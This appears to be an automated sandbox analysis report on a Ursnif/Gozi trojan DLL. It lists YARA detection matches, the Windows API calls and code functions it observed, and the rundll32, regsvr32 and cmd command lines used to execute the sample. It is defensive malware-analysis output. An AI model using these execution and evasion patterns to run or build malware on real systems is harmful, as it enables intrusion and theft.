                  Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                  Source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002284
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF82FC
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF2792
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF2DCC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E382FC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E32DCC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E32792
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E82FC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E2DCC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E2792
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001000 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001BA8 GetProcAddress,NtCreateSection,memset,
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001D37 NtMapViewOfSection,
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100024A5 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF8521 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E3737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E38521 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E8521 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                  Source: ursnif_IAT_corrected.exe.dllVirustotal: Detection: 55%
                  Source: ursnif_IAT_corrected.exe.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll"
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                  Source: classification engineClassification label: mal100.troj.evad.winDLL@10/0@8/3
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF7256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5520:120:WilError_01
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002220 push ecx; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10002273 push ecx; ret
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF82EB push ecx; ret
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AFB859 push 0000006Fh; retf
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AF7F00 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E382EB push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E3B859 push 0000006Fh; retf
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_02E37F00 push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045EB859 push 0000006Fh; retf
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E82EB push ecx; ret
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_045E7F00 push ecx; ret
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100015BD LoadLibraryA,GetProcAddress,
                  Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: Yara matchFile source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
